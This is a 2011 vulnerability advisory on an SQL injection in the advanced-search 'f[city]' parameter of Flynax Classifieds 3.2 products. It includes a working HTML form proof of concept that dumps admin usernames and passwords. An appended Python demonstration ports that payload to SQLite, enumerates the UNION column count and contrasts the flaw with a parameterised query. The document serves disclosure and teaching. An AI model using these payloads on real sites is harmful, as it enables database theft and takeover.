Vulnerability found in Flynax Classifieds products

2011-09-26T00:00:00
ID SECURITYVULNS:DOC:27065
Type securityvulns
Reporter Securityvulns
Modified 2011-09-26T00:00:00

Description

I. BACKGROUND

Flynax is a software development company that produces several CMSs for running different kinds of classifieds websites.

II. DESCRIPTION

Nasel members discovered a critical vulnerability in the front-end of these products.

The vulnerability is an SQL injection in the advanced search, specifically in the "f[city]" parameter, located in the following files:

  • General Classifieds Software: dealers.html
  • Real Estate Classifieds: agents-realtors.html
  • Auto Classifieds Script: dealers.html
  • Pets Classifieds Software: dealers.html

Exploiting this vulnerability can lead to full disclosure of the database: the injected value breaks out of a quoted condition and appends a UNION SELECT that returns rows from arbitrary tables, as the PoC below does for the admin users table.

III. AFFECTED PRODUCTS

  • General Classifieds Software 3.2
  • Auto Classifieds Script 3.2
  • Real Estate Classifieds 3.2
  • Pets Classifieds Software 3.2

IV. PoC

<form action="http://site/path/dealers.html" method="post">
  Injection:
  <!-- The value closes the quoted, parenthesised city condition, neutralises it with "and 1=0",
       UNIONs a 23-column row whose 5th column is "User:Pass" (0x3a is ':'), and the trailing
       "#" comments out the rest of the original MySQL query. -->
  <input type="text" name="f[city]"
         value="') and 1=0 union all select 1,2,3,4,concat_ws(0x3a, User, Pass),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 from fl_admins#">
  <input type="hidden" name="search" value="true">
  <input type="hidden" name="f[country]" value="">
  <input type="submit" value="Send">
</form>

The name of the admin users table can differ depending on the product's version.
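As an added worked example (not part of the advisory and not Flynax's code), the following Python script reconstructs the query shape that the payload implies, ports the payload to an in-memory SQLite database so it runs offline, shows how an attacker enumerates the UNION column count (the reason the published payload lists 23 columns), and contrasts the string-spliced query with a parameterised one. The table layout, sample rows, credential values and function names are all assumptions made for the demonstration.

```python
import sqlite3

# Constructed sample data (not taken from the advisory): a dealers table that
# the advanced search reads, and an admin table holding the credentials the
# published payload targets. Column names User/Pass are the ones the PoC uses.
DEALERS = [
    ("Acme Motors", "Springfield", "US", "555-0100", "acme@example.com"),
    ("Bolt Autos", "Shelbyville", "US", "555-0101", "bolt@example.com"),
]
ADMINS = [
    ("admin", "5f4dcc3b5aa765d61d8327deb882cf99"),   # constructed sample hash
    ("editor", "e10adc3949ba59abbe56e057f20f883e"),  # constructed sample hash
]


def make_db():
    """Build the in-memory SQLite database used by the demonstration."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE fl_dealers "
                 "(name TEXT, city TEXT, country TEXT, phone TEXT, email TEXT)")
    conn.execute("CREATE TABLE fl_admins (User TEXT, Pass TEXT)")
    conn.executemany("INSERT INTO fl_dealers VALUES (?,?,?,?,?)", DEALERS)
    conn.executemany("INSERT INTO fl_admins VALUES (?,?)", ADMINS)
    return conn


def search_vulnerable(conn, city, country=""):
    """Hypothetical reconstruction of the flawed query shape implied by the PoC:
    f[city] is spliced into a quoted, parenthesised condition, so a value that
    starts with ') closes both delimiters and can append a UNION."""
    sql = ("SELECT name, city, country, phone, email FROM fl_dealers "
           f"WHERE (city = '{city}') AND (country LIKE '%{country}%')")
    return conn.execute(sql).fetchall()


def search_fixed(conn, city, country=""):
    """Same query with bound parameters: the input can only ever be a value."""
    sql = ("SELECT name, city, country, phone, email FROM fl_dealers "
           "WHERE (city = ?) AND (country LIKE '%' || ? || '%')")
    return conn.execute(sql, (city, country)).fetchall()


def find_column_count(conn, max_cols=30):
    """Enumerate the column count of the injected SELECT the way an attacker
    does: grow the UNION's column list until the database stops raising a
    column-mismatch error. Returns None if no count up to max_cols works."""
    for n in range(1, max_cols + 1):
        cols = ",".join(str(i) for i in range(1, n + 1))
        payload = f"') and 1=0 union all select {cols}--"
        try:
            search_vulnerable(conn, payload)
            return n
        except sqlite3.OperationalError:
            continue  # "SELECTs ... do not have the same number of result columns"
    return None


# SQLite port of the advisory's payload: '||' replaces concat_ws(0x3a, ...),
# '--' replaces MySQL's '#' line comment, and the column list matches this
# demo's 5-column query instead of the 23 columns of the real dealers.html query.
ADMIN_DUMP = "') and 1=0 union all select 1,2,User||':'||Pass,4,5 from fl_admins--"


def dump_admins(conn):
    """Run the ported payload and return the User:Pass strings it exfiltrates."""
    return [row[2] for row in search_vulnerable(conn, ADMIN_DUMP)]


if __name__ == "__main__":
    db = make_db()
    print("columns in the injected SELECT:", find_column_count(db))
    print("leaked via vulnerable search:", dump_admins(db))
    print("same payload against fixed search:", search_fixed(db, ADMIN_DUMP))
```

The column probe is the step the advisory leaves implicit: a UNION only succeeds when both sides return the same number of columns, so the attacker first walks the count upward until the error disappears, then places the interesting expression in a column that the page actually renders. With bound parameters the same payload is compared as a literal city name and matches nothing.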

V. CREDITS

This vulnerability was found by the Nasel Penetration Testing team, formed by:

  • Alessandri, Santiago (salessandri [at] nasel [dot] com [dot] ar)
  • Benencia, Raul (rbenencia [at] nasel [dot] com [dot] ar)
  • Fontanini, Matias (mfontanini [at] nasel [dot] com [dot] ar)
  • Traberg, Carlos Gaston (gtraberg [at] nasel [dot] com [dot] ar)

VI. ADVISORY INFORMATION

2011-09-15

Vulnerability found. Vendor notified. Advisory release scheduled for September 25th, 2011.

2011-09-17

Vendor replied that the problem was fixed.

2011-09-25

Advisory released.

-- Nasel Penetration Testing Team http://www.nasel.com.ar